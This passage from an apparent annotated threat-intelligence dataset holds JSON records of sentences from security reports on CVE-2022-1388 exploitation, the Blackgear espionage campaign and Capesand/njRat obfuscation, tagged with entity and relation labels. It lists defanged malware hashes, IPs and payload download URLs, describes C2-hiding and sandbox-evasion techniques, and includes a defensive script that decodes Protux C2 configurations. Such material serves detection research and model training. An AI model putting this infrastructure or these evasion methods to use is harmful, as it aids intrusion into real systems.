products.","entities":[{"id":10409,"label":"identity","start_offset":2,"end_offset":9},{"id":49205,"label":"tools","start_offset":64,"end_offset":73}],"relations":[],"Comments":[]} {"id":3441,"text":"Palo Alto Networks Next Generation Firewall Threat Prevention customers are protected with Signature 92570.","entities":[{"id":49206,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":3442,"text":" Vulnerable Systems Mitigation Actions Observed in the Wild Conclusion Additional Resources Indicators of Compromise The F5 product vulnerable to CVE-2022-1388 is BIG-IP with the following versions: The vulnerability exists within the iControl REST framework used by BIG-IP.","entities":[{"id":49208,"label":"vulnerability","start_offset":201,"end_offset":218},{"id":49209,"label":"tools","start_offset":118,"end_offset":132},{"id":49207,"label":"vulnerability","start_offset":146,"end_offset":160},{"id":49210,"label":"tools","start_offset":237,"end_offset":260}],"relations":[{"id":755,"from_id":49208,"to_id":49207,"type":"duplicate-of"},{"id":756,"from_id":49209,"to_id":49207,"type":"has"},{"id":757,"from_id":49210,"to_id":49208,"type":"has"}],"Comments":[]} {"id":3443,"text":" We recommend that customers update their F5 BIG-IP deployments to one of the following versions that have patches to mitigate CVE-2022-1388:","entities":[{"id":49212,"label":"tools","start_offset":42,"end_offset":51},{"id":49211,"label":"vulnerability","start_offset":127,"end_offset":140}],"relations":[{"id":758,"from_id":49212,"to_id":49211,"type":"has"}],"Comments":[]} {"id":3444,"text":" Until you can install the patched versions of BIG-IP, see the Mitigation section on the F5 security advisory for information on how to mitigate this vulnerability via a workaround to limit the vulnerable component to trusted networks. In response to the F5 security advisory, Palo Alto Networks released the Threat Prevention signature F5 BIG-IP Authentication Bypass Vulnerability (92570) on May 9.","entities":[{"id":49218,"label":"TIME","start_offset":395,"end_offset":400},{"id":49213,"label":"tools","start_offset":47,"end_offset":53},{"id":49215,"label":"identity","start_offset":256,"end_offset":258},{"id":49216,"label":"identity","start_offset":278,"end_offset":296},{"id":49217,"label":"vulnerability","start_offset":338,"end_offset":391},{"id":49214,"label":"identity","start_offset":89,"end_offset":91}],"relations":[],"Comments":[]} {"id":3445,"text":" We observed this signature triggered 2,552 times between 4:47 and 14:00 UTC on May 10.","entities":[{"id":49219,"label":"TIME","start_offset":50,"end_offset":86}],"relations":[],"Comments":[]} {"id":3446,"text":"We were able to analyze 2,151 packets that triggered the signature and observed both vulnerability scanning activity and active exploitation attempts.","entities":[],"relations":[],"Comments":[]} {"id":3447,"text":" Table 1 shows the commands that would be executed in the event of successful exploitation.","entities":[],"relations":[],"Comments":[]} {"id":3448,"text":"These were found by analysis of the packet captures that triggered the F5 BIG-IP Authentication Bypass Vulnerability signature.","entities":[{"id":49220,"label":"vulnerability","start_offset":81,"end_offset":116},{"id":49221,"label":"tools","start_offset":71,"end_offset":80}],"relations":[{"id":759,"from_id":49221,"to_id":49220,"type":"has"}],"Comments":[]} {"id":3449,"text":" Table 1. Commands observed in CVE-2022-1388 exploitation attempts.","entities":[{"id":49222,"label":"vulnerability","start_offset":31,"end_offset":44}],"relations":[],"Comments":[]} {"id":3450,"text":" Palo Alto Networks customers receive protections against the exploitation of this vulnerability in the following ways: Palo Alto Networks will update this Threat Brief with new information and recommendations as they become available.","entities":[{"id":49223,"label":"identity","start_offset":1,"end_offset":19},{"id":49224,"label":"identity","start_offset":121,"end_offset":139}],"relations":[],"Comments":[]} {"id":3451,"text":" K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388 EnemyBot Attempts to Exploit CVE-2022-1388 30f7e1998d162dfad69d6d8abb763ae4033bbd4a015d170b1ad3e20d39cd4e20 da647646cd36a3acb716b4266e9032f9c1caf555b7667e1dbe5bef89e7d2fdbb b39d2a1202351d3be5d9906ec47ee05c305302124dddec5538dc7b9924c6b85d ad6d44c70f83431bedf890967f2da0607c9b1f79591fb1b2697160f5b1c1a75c 1f93a6696f7bf1b2067cc503583deb4840404ebeeba89579bd303f57000baeb7 9a72aab2a3d1d6e66c185966597a52a8726ca25f5d9e2195af44f98d8b1847d5 53214f4d2d2dfd02b46f416cbdcb6f3a764820a50da4d59926f829b96cf82a6c 20.187.67[.]224 192.132.218[.]149 85.203.23[.]73 116.48.110[.]159 hxxps:\/\/transfer[.]sh\/dlxo3I\/1.sh hxxp:\/\/20.239.193[.]47\/kele.sh hxxp:\/\/20.239.193[.]47\/kele1 hxxp:\/\/20.187.86[.]47\/dadda Updated May 16, 2022 Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":10440,"label":"malware","start_offset":61,"end_offset":69},{"id":10442,"label":"SHA2","start_offset":170,"end_offset":234},{"id":10443,"label":"SHA2","start_offset":235,"end_offset":299},{"id":10444,"label":"SHA2","start_offset":300,"end_offset":364},{"id":10446,"label":"SHA2","start_offset":430,"end_offset":494},{"id":10447,"label":"SHA2","start_offset":495,"end_offset":559},{"id":10448,"label":"IPV4","start_offset":561,"end_offset":576},{"id":10449,"label":"IPV4","start_offset":577,"end_offset":594},{"id":10450,"label":"IPV4","start_offset":595,"end_offset":609},{"id":10451,"label":"IPV4","start_offset":610,"end_offset":626},{"id":10441,"label":"SHA2","start_offset":105,"end_offset":169},{"id":10445,"label":"SHA2","start_offset":365,"end_offset":429},{"id":49225,"label":"vulnerability","start_offset":12,"end_offset":60},{"id":49228,"label":"DOMAIN","start_offset":662,"end_offset":692},{"id":49229,"label":"DOMAIN","start_offset":693,"end_offset":721},{"id":49226,"label":"vulnerability","start_offset":90,"end_offset":103},{"id":49230,"label":"DOMAIN","start_offset":722,"end_offset":749},{"id":49231,"label":"TIME","start_offset":759,"end_offset":771},{"id":49227,"label":"DOMAIN","start_offset":628,"end_offset":661}],"relations":[{"id":760,"from_id":10440,"to_id":49226,"type":"exploits"}],"Comments":[]} {"id":3452,"text":" Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} {"id":3453,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":3454,"text":"Blackgear (also known as Topgear and Comnie) is a cyberespionage campaign dating back to 2008, at least based on the Protux backdoor used by its operators.","entities":[{"id":49232,"label":"campaign","start_offset":0,"end_offset":9},{"id":49233,"label":"campaign","start_offset":25,"end_offset":32},{"id":49234,"label":"campaign","start_offset":37,"end_offset":43},{"id":49235,"label":"TIME","start_offset":89,"end_offset":93},{"id":49236,"label":"malware","start_offset":117,"end_offset":132}],"relations":[{"id":761,"from_id":49233,"to_id":49232,"type":"duplicate-of"},{"id":762,"from_id":49234,"to_id":49232,"type":"duplicate-of"}],"Comments":[]} {"id":3455,"text":"It targets organizations in Japan, South Korea, and Taiwan, leveling its attacks on public sector agencies and telecommunications and other high-technology industries.","entities":[{"id":49237,"label":"location","start_offset":28,"end_offset":33},{"id":49238,"label":"location","start_offset":35,"end_offset":46},{"id":49239,"label":"location","start_offset":52,"end_offset":58}],"relations":[],"Comments":[]} {"id":3456,"text":"In 2016, for instance, we found their campaigns attacking Japanese organizations with various malware tools, notably the Elirks backdoor.","entities":[{"id":49240,"label":"TIME","start_offset":3,"end_offset":7},{"id":49241,"label":"malware","start_offset":121,"end_offset":127}],"relations":[],"Comments":[]} {"id":3457,"text":"Blackgear’s operators are well-organized, developing their own tools, which we observed to have been recently fine-tuned, based on their latest attacks.","entities":[{"id":49242,"label":"threat-actor","start_offset":0,"end_offset":21}],"relations":[],"Comments":[]} {"id":3458,"text":"A notable characteristic of Blackgear is the degree to which its attacks are taken to evade detection, abusing blogging, microblogging, and social media services to hide its command-and-control (C&C) configuration.","entities":[{"id":49244,"label":"attack-pattern","start_offset":86,"end_offset":101},{"id":49247,"label":"attack-pattern","start_offset":165,"end_offset":213},{"id":49248,"label":"attack-pattern","start_offset":103,"end_offset":161},{"id":49243,"label":"threat-actor","start_offset":28,"end_offset":37}],"relations":[{"id":763,"from_id":49243,"to_id":49244,"type":"uses"},{"id":765,"from_id":49243,"to_id":49247,"type":"uses"},{"id":766,"from_id":49243,"to_id":49248,"type":"uses"}],"Comments":[]} {"id":3459,"text":"Compared to when C&C information is embedded within the malware, where it’s preset and can thus be easily blocked, this tactic lets Blackgear’s operators to quickly change C&C servers as needed.","entities":[{"id":49249,"label":"threat-actor","start_offset":132,"end_offset":141}],"relations":[],"Comments":[]} {"id":3460,"text":"It can, in turn, prolong the campaign’s foothold in the system and enable attackers to carry out further lateral movement.","entities":[{"id":49250,"label":"attack-pattern","start_offset":105,"end_offset":121}],"relations":[],"Comments":[]} {"id":3461,"text":"Analyzing the Marade downloader (detected by Trend Micro as TSPY_MARADE.ZTBC) and the version of Protux (BKDR_PROTUX.ZTBC) employed by Blackgear’s latest campaigns, we found their encrypted configurations on blog and social media posts (see Figure 1).","entities":[{"id":49251,"label":"malware","start_offset":14,"end_offset":31},{"id":49252,"label":"identity","start_offset":45,"end_offset":56},{"id":49254,"label":"malware","start_offset":97,"end_offset":122},{"id":49255,"label":"threat-actor","start_offset":135,"end_offset":144},{"id":49253,"label":"malware","start_offset":60,"end_offset":76}],"relations":[{"id":767,"from_id":49253,"to_id":49251,"type":"duplicate-of"},{"id":768,"from_id":49254,"to_id":49251,"type":"based-on"},{"id":769,"from_id":49251,"to_id":49255,"type":"authored-by"}],"Comments":[]} {"id":3462,"text":"This can be an indication that these malware tools were developed by the same group.","entities":[],"relations":[],"Comments":[]} {"id":3463,"text":"Figure 1. Marade’s encrypted configuration on a Facebook post Figure 2. Infection chain of Blackgear’s attack Attack chain","entities":[{"id":49258,"label":"threat-actor","start_offset":91,"end_offset":100},{"id":49256,"label":"malware","start_offset":10,"end_offset":17},{"id":49257,"label":"SOFTWARE","start_offset":48,"end_offset":56}],"relations":[{"id":770,"from_id":49256,"to_id":49257,"type":"uses"}],"Comments":[]} {"id":3464,"text":"To paint a bigger picture of Blackgear’s attacks, we correlated the tools and tactics they used against their targets.","entities":[{"id":49259,"label":"threat-actor","start_offset":29,"end_offset":38}],"relations":[],"Comments":[]} {"id":3465,"text":"Here’s a summary of Blackgear’s latest campaign: Use a decoy document or fake installer file, sent via spam email to lure a potential victim into clicking it.","entities":[{"id":49260,"label":"campaign","start_offset":20,"end_offset":47},{"id":49262,"label":"attack-pattern","start_offset":104,"end_offset":114},{"id":49261,"label":"attack-pattern","start_offset":56,"end_offset":93}],"relations":[{"id":771,"from_id":49260,"to_id":49261,"type":"uses"},{"id":772,"from_id":49260,"to_id":49262,"type":"uses"}],"Comments":[]} {"id":3466,"text":"The decoy document will extract the Marade downloader.","entities":[{"id":49264,"label":"malware","start_offset":36,"end_offset":53},{"id":49265,"label":"attack-pattern","start_offset":4,"end_offset":18}],"relations":[{"id":774,"from_id":49265,"to_id":49264,"type":"delivers"}],"Comments":[]} {"id":3467,"text":"It drops itself in the machine’s Temp folder and increases its file size to over 50MB in order to bypass traditional sandbox solutions.","entities":[],"relations":[],"Comments":[]} {"id":3468,"text":"Marade will check if the infected host can connect to the internet and if it is installed with anti-virus (AV) software.","entities":[{"id":49266,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":3469,"text":"If the affected system can connect online and doesn’t have AV software, Marade will connect to a Blackgear-controlled public blog or social media post to retrieve an encrypted C&C configuration.","entities":[{"id":49269,"label":"Infrastucture","start_offset":118,"end_offset":193},{"id":49267,"label":"malware","start_offset":72,"end_offset":78},{"id":49268,"label":"threat-actor","start_offset":97,"end_offset":106}],"relations":[{"id":775,"from_id":49268,"to_id":49269,"type":"controls"},{"id":776,"from_id":49267,"to_id":49269,"type":"beacons-to"}],"Comments":[]} {"id":3470,"text":"Otherwise, Marade will use the C&C information embedded in its code.","entities":[{"id":49270,"label":"malware","start_offset":11,"end_offset":17}],"relations":[],"Comments":[]} {"id":3471,"text":"The encrypted strings will pose as a magnet link to keep its malicious traffic from being detected by AV software.","entities":[],"relations":[],"Comments":[]} {"id":3472,"text":"Marade will then decrypt the encrypted strings and retrieve the C&C server information.","entities":[{"id":49271,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":3473,"text":"The C&C server will send Protux to the victim’s host and execute it.","entities":[{"id":49272,"label":"malware","start_offset":25,"end_offset":31}],"relations":[],"Comments":[]} {"id":3474,"text":"Protux, a known backdoor, is executed by abusing the rundll32 dynamic-link library (DLL).","entities":[{"id":49273,"label":"malware","start_offset":0,"end_offset":6},{"id":49274,"label":"attack-pattern","start_offset":41,"end_offset":88}],"relations":[{"id":777,"from_id":49273,"to_id":49274,"type":"uses"}],"Comments":[]} {"id":3475,"text":"It tests the host’s network, retrieves the C&C server from another blog, and uses the RSA algorithm to generate the session key and send information to the C&C server. Blackgear’s malware tools are delivered to targets using RAR self-extracting executable (SFX) files or office Visual Basic Script (VBScript) to create a decoy document.","entities":[{"id":49276,"label":"attack-pattern","start_offset":322,"end_offset":336},{"id":49275,"label":"threat-actor","start_offset":169,"end_offset":178}],"relations":[],"Comments":[]} {"id":3476,"text":"Below is a screenshot of the SFX files and document used by the latest campaigns: Figure 3.","entities":[],"relations":[],"Comments":[]} {"id":3477,"text":"Contents of malicious SFX file used by Blackgear, posing as a Flash Player installer Figure 4. Malicious document used by Blackgear (top) and how VBScript is used to execute Marade (bottom)","entities":[{"id":49277,"label":"threat-actor","start_offset":38,"end_offset":48},{"id":49278,"label":"SOFTWARE","start_offset":62,"end_offset":74},{"id":49279,"label":"threat-actor","start_offset":123,"end_offset":132},{"id":49280,"label":"malware","start_offset":175,"end_offset":181}],"relations":[],"Comments":[]} {"id":3478,"text":"Figure 5.","entities":[],"relations":[],"Comments":[]} {"id":3479,"text":"Encrypted configurations of Protux (top) and Marade (bottom) in the same blog post Correlating Marade and Protux","entities":[{"id":49281,"label":"malware","start_offset":28,"end_offset":34},{"id":49282,"label":"malware","start_offset":45,"end_offset":51},{"id":49283,"label":"malware","start_offset":95,"end_offset":101},{"id":49284,"label":"malware","start_offset":106,"end_offset":112}],"relations":[{"id":778,"from_id":49283,"to_id":49284,"type":"variant-of"}],"Comments":[]} {"id":3480,"text":"The encrypted configurations of Marade and Protux can both be found on a single blog post.","entities":[{"id":49285,"label":"malware","start_offset":32,"end_offset":38},{"id":49286,"label":"malware","start_offset":43,"end_offset":49}],"relations":[],"Comments":[]} {"id":3481,"text":"As shown in Figure 5, the strings highlighted in red function as a search tag to identify the location of the configuration information; those highlighted in orange pertain to the encrypted configuration that Protux will retrieve.","entities":[{"id":49287,"label":"malware","start_offset":209,"end_offset":215}],"relations":[],"Comments":[]} {"id":3482,"text":"In Blackgear’s previous campaigns, Protux’s configuration format had to be changed to another version.","entities":[{"id":49288,"label":"threat-actor","start_offset":3,"end_offset":12},{"id":49289,"label":"malware","start_offset":35,"end_offset":41}],"relations":[],"Comments":[]} {"id":3483,"text":"For instance, Protux’s older iteration will look for the “++a++” tag, as shown in Figure 5.","entities":[{"id":49290,"label":"malware","start_offset":14,"end_offset":20}],"relations":[],"Comments":[]} {"id":3484,"text":"The format used by Protux’s latest version is now similar to Marade’s, as shown in Figure 6.","entities":[{"id":10580,"label":"malware","start_offset":19,"end_offset":25},{"id":49291,"label":"malware","start_offset":61,"end_offset":67}],"relations":[],"Comments":[]} {"id":3485,"text":"Figure 6.","entities":[],"relations":[],"Comments":[]} {"id":3486,"text":"Protux’s encrypted configuration on a public blog (note the six magnet URLs; the third is Protux’s latest configuration format)","entities":[{"id":10584,"label":"malware","start_offset":0,"end_offset":6},{"id":10589,"label":"malware","start_offset":90,"end_offset":96}],"relations":[],"Comments":[]} {"id":3487,"text":"Reverse analysis of Protux’s latest version also allowed us to determine how to decrypt the C&C information, which is done in the Python code shown below.","entities":[{"id":10590,"label":"malware","start_offset":20,"end_offset":26}],"relations":[],"Comments":[]} {"id":3488,"text":"This can also be used by researchers, system administrators, and information security professionals when decrypting Protux’s latest version.","entities":[{"id":49292,"label":"malware","start_offset":116,"end_offset":122}],"relations":[],"Comments":[]} {"id":3489,"text":"\/usr","entities":[],"relations":[],"Comments":[]} {"id":3490,"text":"bin","entities":[],"relations":[],"Comments":[]} {"id":3491,"text":"env python2","entities":[],"relations":[],"Comments":[]} {"id":3492,"text":"#-*-coding:utf-8 -*- import os, sys, datetime, operator, base64 def decrypt(): if len(sys.argv) != 2: print \"Usegae : .\/decrypt_protux_magnet.py \" sys.exit(0) str = sys.argv[1] head = str.find(\"magnet:?xt=urn:bhih:\")","entities":[],"relations":[],"Comments":[]} {"id":3493,"text":"tail = str.find(\"&xl=\") if -1 ==tail: tail = str.find(\"&xl=\") if -1 == head or -1 == tail: print(\"can't find delimiter\") sys.exit()","entities":[],"relations":[],"Comments":[]} {"id":3494,"text":"b64_data = str[len(\"magnet:?xt=urn:bhih:\"): tail] b64_decode = base64.b64decode(b64_data) key = ord(b64_decode[2]) data = b64_decode[4:] output_file = open(\"C2_info\", \"wb\") for single_byte in data: output_file.write(chr(ord(single_byte) ^ key)) output_file.close()","entities":[],"relations":[],"Comments":[]} {"id":3495,"text":"if __name__ == '__main__': decrypt (","entities":[],"relations":[],"Comments":[]} {"id":3496,"text":"A new remote controller tool","entities":[],"relations":[],"Comments":[]} {"id":3497,"text":"We were also able to source a sample of Protux’s remote controller tool.","entities":[{"id":49293,"label":"malware","start_offset":40,"end_offset":46}],"relations":[],"Comments":[]} {"id":3498,"text":"This provides a user interface (UI) that allows attackers to send instructions to and monitor any compromised endpoint host.","entities":[],"relations":[],"Comments":[]} {"id":3499,"text":"This tool can also remotely control Marade in the affected system.","entities":[{"id":49294,"label":"malware","start_offset":36,"end_offset":42}],"relations":[],"Comments":[]} {"id":3500,"text":" Figure 7.","entities":[],"relations":[],"Comments":[]} {"id":3501,"text":"The controller retrieving the Marade-related information (top) and collecting Protux-related information (bottom)","entities":[{"id":49296,"label":"malware","start_offset":30,"end_offset":36},{"id":49295,"label":"malware","start_offset":78,"end_offset":84}],"relations":[],"Comments":[]} {"id":3502,"text":"Based on the controller’s behavior, we can posit that both Marade and Protux were authored by the same threat actors.","entities":[{"id":49298,"label":"malware","start_offset":70,"end_offset":76},{"id":49297,"label":"malware","start_offset":59,"end_offset":65}],"relations":[{"id":780,"from_id":49297,"to_id":49298,"type":"variant-of"}],"Comments":[]} {"id":3503,"text":"Each serves a specific role once in the system.","entities":[],"relations":[],"Comments":[]} {"id":3504,"text":"Marade acts as the first stage of attack, sending the compromised system’s information to the C&C server and then awaiting commands from the controller.","entities":[{"id":49299,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":3505,"text":"This allows threat actors to monitor and check whether the affected system is of interest to them.","entities":[],"relations":[],"Comments":[]} {"id":3506,"text":"If so, the attack moves to the second stage by deploying Protux.","entities":[{"id":49300,"label":"malware","start_offset":57,"end_offset":63}],"relations":[],"Comments":[]} {"id":3507,"text":"The tool can also control the communication between the backdoor and attacker in real time.","entities":[],"relations":[],"Comments":[]} {"id":3508,"text":"The following is a list of Protux’s notable components and their functions: FileManage - Lists all of the system’s drives and folders.","entities":[{"id":49301,"label":"malware","start_offset":27,"end_offset":33}],"relations":[],"Comments":[]} {"id":3509,"text":"ProcManage - Lists all of the processes, modules, threads, and ports in the compromised host.","entities":[],"relations":[],"Comments":[]} {"id":3510,"text":"ServiceManage - Lists all of the services in the compromised host.","entities":[],"relations":[],"Comments":[]} {"id":3511,"text":"RegManage - Lists all of the registries in the compromised host.","entities":[],"relations":[],"Comments":[]} {"id":3512,"text":"ScreenManage - Takes a screenshot.","entities":[],"relations":[],"Comments":[]} {"id":3513,"text":"ShellManage - Creates a shell.","entities":[],"relations":[],"Comments":[]} {"id":3514,"text":"Protux:","entities":[{"id":10643,"label":"malware","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} {"id":3515,"text":"An old dog learning new tricks Protux is an old backdoor, with its first version developed in 2005.","entities":[{"id":10644,"label":"malware","start_offset":31,"end_offset":37},{"id":49302,"label":"TIME","start_offset":94,"end_offset":98}],"relations":[],"Comments":[]} {"id":3516,"text":"It uses DLL injection to execute its routines.","entities":[],"relations":[],"Comments":[]} {"id":3517,"text":"Based on this behavior, we can map out a pattern, from the downloader to the decoy documents used.","entities":[],"relations":[],"Comments":[]} {"id":3518,"text":"The trigger format is: %system32\/rundll32.exe .","entities":[{"id":49303,"label":"FILEPATH","start_offset":23,"end_offset":45}],"relations":[],"Comments":[]} {"id":3519,"text":"We saw two notable changes throughout Protux’s history: its export name and how it functions:","entities":[{"id":49304,"label":"malware","start_offset":38,"end_offset":44}],"relations":[],"Comments":[]} {"id":3520,"text":" Export name Year How C&C information is retreieved TStartUp 2005 – 2012","entities":[{"id":49305,"label":"TIME","start_offset":61,"end_offset":72}],"relations":[],"Comments":[]} {"id":3521,"text":"Directly connect to the C&C server and use DNS server to retrieve the C&C IP address.","entities":[],"relations":[],"Comments":[]} {"id":3522,"text":"CRestart 2009 – 2014 Use web DNS query to retrieve the C&C IP address, e.g., ip138[.]com.","entities":[{"id":49306,"label":"TIME","start_offset":9,"end_offset":20},{"id":49307,"label":"DOMAIN","start_offset":77,"end_offset":88}],"relations":[],"Comments":[]} {"id":3523,"text":"CReset 2013 – 2018","entities":[{"id":49308,"label":"malware","start_offset":7,"end_offset":18}],"relations":[],"Comments":[]} {"id":3524,"text":"Find the encrypted configuration through keywords on blog services.","entities":[],"relations":[],"Comments":[]} {"id":3525,"text":" Our research into and correlation of Protux led us to several samples that have version numbers embedded in them.","entities":[{"id":10661,"label":"malware","start_offset":39,"end_offset":45}],"relations":[],"Comments":[]} {"id":3526,"text":"The highlighted portions in Figure 8 show the backdoor’s version number and timestamp with the “with encrypt” strings.","entities":[],"relations":[],"Comments":[]} {"id":3527,"text":"We also found that these versions encrypt the communication to its C&C servers.","entities":[],"relations":[],"Comments":[]} {"id":3528,"text":"Protux’s latest version, 3.7, uses the open-source compiler OpenCSP to generate a session key with the RSA algorithm.","entities":[{"id":10665,"label":"malware","start_offset":0,"end_offset":6},{"id":49309,"label":"tools","start_offset":60,"end_offset":67}],"relations":[{"id":781,"from_id":10665,"to_id":49309,"type":"uses"}],"Comments":[]} {"id":3529,"text":"Figure 8.","entities":[],"relations":[],"Comments":[]} {"id":3530,"text":"Different versions of Protux used by Blackgear Figure 9.","entities":[{"id":49310,"label":"malware","start_offset":22,"end_offset":28},{"id":49311,"label":"threat-actor","start_offset":37,"end_offset":46}],"relations":[{"id":782,"from_id":49311,"to_id":49310,"type":"uses"}],"Comments":[]} {"id":3531,"text":"Protux with the OpenCSP encryption function Building a proactive incident response strategy Blackgear has been targeting various industries since its emergence a decade ago.","entities":[{"id":49314,"label":"threat-actor","start_offset":92,"end_offset":101},{"id":49312,"label":"malware","start_offset":0,"end_offset":7},{"id":49313,"label":"tools","start_offset":16,"end_offset":23}],"relations":[],"Comments":[]} {"id":3532,"text":"Its apparent staying power stems from the furtive ways with which its attacks can evade traditional security solutions.","entities":[],"relations":[],"Comments":[]} {"id":3533,"text":"For instance, Blackgear employs two stages of infection for each of its attacks.","entities":[{"id":49315,"label":"threat-actor","start_offset":14,"end_offset":23}],"relations":[],"Comments":[]} {"id":3534,"text":"The potential victim may not be able to notice the intrusions as the first stage involves only profiling and reconnaissance.","entities":[],"relations":[],"Comments":[]} {"id":3535,"text":"And once infection with a backdoor occurs, typical red flags may not be raised as it abuses microblogging and social media services to retrieve information needed for C&C communication.","entities":[],"relations":[],"Comments":[]} {"id":3536,"text":"Indeed, Blackgear’s attacks exemplify the need for organizations to develop and implement security strategies that can proactively respond to threats.","entities":[{"id":49316,"label":"threat-actor","start_offset":8,"end_offset":18}],"relations":[],"Comments":[]} {"id":3537,"text":"A robust threat hunting strategy, for instance, helps validate indicators of attack to ascertain if the intrusions, threats, or suspicious system activities are one-off attacks or part of a larger campaign.","entities":[],"relations":[],"Comments":[]} {"id":3538,"text":"This further visibility equips organizations with actionable threat intelligence, context, and insights that can be used to delve deeper into an attack — which security gaps are exploited, if the attack has multiple payloads, or if the malware has already spread within the network.","entities":[],"relations":[],"Comments":[]} {"id":3539,"text":"Organizations can also consider managed detection and response, which provides in-depth threat analysis and correlation — from networks to servers and endpoints — to obtain a complete picture of and further understand a targeted attack.","entities":[],"relations":[],"Comments":[]} {"id":3540,"text":"Managed detection and response also helps make better sense of system- and network-level activities that an organization may not have the time or resources to do.","entities":[],"relations":[],"Comments":[]} {"id":3541,"text":"A list of indicators of compromise (IoCs) related to Blackgear is in this appendix.","entities":[{"id":49317,"label":"threat-actor","start_offset":53,"end_offset":62}],"relations":[],"Comments":[]} {"id":3542,"text":"Trend Micro solutions","entities":[{"id":49318,"label":"identity","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} {"id":3543,"text":"The Trend Micro™ Deep Discovery™ solution provides detection, in-depth analysis, and proactive response to today’s stealthy malware and targeted attacks in real time.","entities":[{"id":49319,"label":"identity","start_offset":4,"end_offset":15},{"id":49320,"label":"tools","start_offset":17,"end_offset":31}],"relations":[],"Comments":[]} {"id":3544,"text":"It provides a comprehensive defense tailored to protect organizations against targeted attacks and advanced threats through specialized engines, custom sandboxing, and seamless correlation across the entire attack life cycle, allowing it to detect threats delivered by Blackgear even without any engine or pattern update.","entities":[{"id":49321,"label":"threat-actor","start_offset":269,"end_offset":278}],"relations":[],"Comments":[]} {"id":3545,"text":"Blackgear’s campaigns also use email as an entry point, which is why it’s important to secure the email gateway.","entities":[{"id":49322,"label":"threat-actor","start_offset":0,"end_offset":9},{"id":49323,"label":"attack-pattern","start_offset":27,"end_offset":54}],"relations":[{"id":783,"from_id":49322,"to_id":49323,"type":"uses"}],"Comments":[]} {"id":3546,"text":"The Trend Micro™ Hosted Email Security no-maintenance cloud solution delivers continuously updated protection to stop spam, malware, spear phishing, and advanced targeted attacks before they reach the network.","entities":[{"id":49326,"label":"attack-pattern","start_offset":153,"end_offset":178},{"id":49324,"label":"identity","start_offset":4,"end_offset":15},{"id":49325,"label":"attack-pattern","start_offset":133,"end_offset":147}],"relations":[],"Comments":[]} {"id":3547,"text":"The Trend Micro™ Deep Discovery™ Email Inspector and InterScan™ Web Security solutions prevent malware from ever reaching end users.","entities":[{"id":49329,"label":"tools","start_offset":53,"end_offset":62},{"id":49327,"label":"identity","start_offset":4,"end_offset":15},{"id":49328,"label":"tools","start_offset":17,"end_offset":31}],"relations":[],"Comments":[]} {"id":3548,"text":"At the endpoint level, the Trend Micro™ Smart Protection Suites deliver several capabilities that minimize the impact of attacks.","entities":[{"id":49330,"label":"identity","start_offset":27,"end_offset":38}],"relations":[],"Comments":[]} {"id":3549,"text":" Tags Articles, News, Reports | APT & Targeted Attacks | Research","entities":[],"relations":[],"Comments":[]} {"id":3550,"text":"In November 2019, we published a blog analyzing an exploit kit we named Capesand that exploited Adobe Flash and Microsoft Internet Explorer flaws.","entities":[{"id":49331,"label":"TIME","start_offset":3,"end_offset":16},{"id":49332,"label":"malware","start_offset":72,"end_offset":80},{"id":49333,"label":"SOFTWARE","start_offset":96,"end_offset":107},{"id":49334,"label":"SOFTWARE","start_offset":112,"end_offset":139}],"relations":[{"id":784,"from_id":49332,"to_id":49333,"type":"exploits"},{"id":785,"from_id":49332,"to_id":49334,"type":"exploits"}],"Comments":[]} {"id":3551,"text":"During our analysis of the indicators of compromise (IoCs) in the deployed samples that were infecting the victim’s machines, we noticed some interesting characteristics: notably that these samples were making use of obfuscation tools that made them virtually undetectable.","entities":[],"relations":[],"Comments":[]} {"id":3552,"text":"After some data collection we found more than 300 samples that correlate to the mentioned indicators that were recently very active our first detections occurred in August, with the campaign itself still ongoing (having occasional spikes in between).","entities":[{"id":49335,"label":"TIME","start_offset":166,"end_offset":172}],"relations":[],"Comments":[]} {"id":3553,"text":"We saw a rising usage of tools that provide fully-undetectable obfuscation capabilities – signifying that the authors behind the samples designed their malware variants to be as stealthy as possible.","entities":[],"relations":[],"Comments":[]} {"id":3554,"text":"We decided to name the potential campaign associated with these IoCs as “KurdishCoder”, based on the property name of an assembly module found in one of the samples.","entities":[{"id":49336,"label":"campaign","start_offset":73,"end_offset":85}],"relations":[],"Comments":[]} {"id":3555,"text":"We took a look at one of the samples captured from Capesand that was used to deploy the njRat malware – notably its main executable NotepadEx.","entities":[{"id":10758,"label":"malware","start_offset":88,"end_offset":93},{"id":49337,"label":"malware","start_offset":51,"end_offset":59}],"relations":[{"id":786,"from_id":49337,"to_id":10758,"type":"delivers"}],"Comments":[]} {"id":3556,"text":"We found that were multiple layers of obfuscation using a combination of two tools: the .NET protectors ConfuserEx and Cassandra (CyaX).","entities":[{"id":49338,"label":"tools","start_offset":104,"end_offset":114},{"id":49339,"label":"tools","start_offset":119,"end_offset":135}],"relations":[],"Comments":[]} {"id":3557,"text":"Both of these tools are used in combination to provide an array of fully undetectable capabilities to the deployed njRat malware variant.","entities":[{"id":49340,"label":"malware","start_offset":115,"end_offset":120}],"relations":[],"Comments":[]} {"id":3558,"text":"Examining the Capesand samples The simplified diagram taken from the previous blog shows the combination of ConfuserEx and Cassandra via the second layer of obfuscation protection, which involves the DLL CyaX_Sharp Assembly (both CyaX_Sharp and CyaX are part of the Cassandra protector).","entities":[{"id":49341,"label":"malware","start_offset":14,"end_offset":22},{"id":49342,"label":"tools","start_offset":108,"end_offset":118},{"id":49343,"label":"tools","start_offset":123,"end_offset":132},{"id":49344,"label":"tools","start_offset":230,"end_offset":240},{"id":49345,"label":"tools","start_offset":245,"end_offset":249},{"id":49346,"label":"tools","start_offset":266,"end_offset":285}],"relations":[{"id":787,"from_id":49341,"to_id":49342,"type":"uses"},{"id":788,"from_id":49341,"to_id":49343,"type":"uses"}],"Comments":[]} {"id":3559,"text":"Figure 1.","entities":[],"relations":[],"Comments":[]} {"id":3560,"text":"The infection chain for Capesand that also shows the obfuscation mechanisms For this particular sample, CyaX_Sharp is obfuscated with a customized version of 